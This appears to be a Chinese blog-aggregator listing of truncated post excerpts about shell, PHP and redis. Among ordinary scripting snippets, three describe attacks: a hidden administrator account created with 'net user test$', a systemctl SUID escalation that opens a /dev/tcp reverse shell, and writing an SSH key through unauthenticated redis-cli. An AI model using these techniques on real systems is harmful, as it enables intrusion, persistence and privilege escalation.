shell 在线编辑器:https://www.runoob.com/try/runcode.php?filename=helloworld&type=bash 一下脚本自行测试查看结果 echo "Hello World !" your_name="qinjx" echo your_name fo ...
分类:
系统相关 时间:
2021-05-24 17:21:02
阅读次数:
0
for i in `ps -AL |grep Worker | awk '{print $2}'`; do \ echo $i ; \ gdb --q --n --ex bt --batch --pid $i; \ done 2>&1 |tee /var/stacks.txt CPU使用率较低但负载 ...
分类:
数据库 时间:
2021-05-24 17:19:34
阅读次数:
0
net user test$ 123 /addnet localgroup administrators test$ /addHKEY_LOCAL_MAHINE\SAM\SAM 权限 导出对应的两个文件users和names,然后删除test$在运行这两文件@echo offreg query(查询 ...
分类:
其他好文 时间:
2021-05-24 16:06:04
阅读次数:
0
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:
其他好文 时间:
2021-05-24 14:55:34
阅读次数:
0
<?php class A{ function index (){ echo '我是A的index'; } } class B{ function index (){ echo '我是B的index'; } } class C{ function index (){ echo '我是C的index' ...
分类:
Web程序 时间:
2021-05-24 14:24:42
阅读次数:
0
static::、self::、new self()、new static() <?php class Father{ protected static $name = "大头"; public static function father_self(){ echo self::$name."\n" ...
分类:
其他好文 时间:
2021-05-24 14:21:29
阅读次数:
0
安装 javaee jdk mysql apache ideaIU shell编程 x.sh脚本 格式要求: 1.脚本以#!/bin/bash开头 2.脚本要有可执行权限 vim hello.sh 写上: #!/bin/bash echo "hello,world" 保存退出 sh hello.sh ...
分类:
系统相关 时间:
2021-05-24 13:41:21
阅读次数:
0
写公钥 ssh-keygen -t rsa # 生成key (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /tmp/key.txt # 前后加换行 cat /tmp/key.txt | redis-cli -h 59.xx.xx.157 -x ...
分类:
其他好文 时间:
2021-05-24 13:41:02
阅读次数:
0
第一步获取待下载文件列表. 解压缩到到执行目录下面 我这边使用Windows10 里面的 WSL的方式直接进行相关工作 ls *.zip > list.url 将需要下载的zip包变成列表文件. 第二步 使用shell脚本进行判断文件是否存在 #!/bin/bash echo " "> /deplo ...
分类:
其他好文 时间:
2021-05-24 12:11:03
阅读次数:
0
ps=`ps -efl|grep redis|grep -v $0|grep -v grep|wc -l` if [ $ps -eq 0 ]; then rm -f /www/server/redis/redis.pid echo -e "\n$(date '+%Y-%m-%d %H:%M:%S') ...
分类:
其他好文 时间:
2021-05-24 10:05:33
阅读次数:
0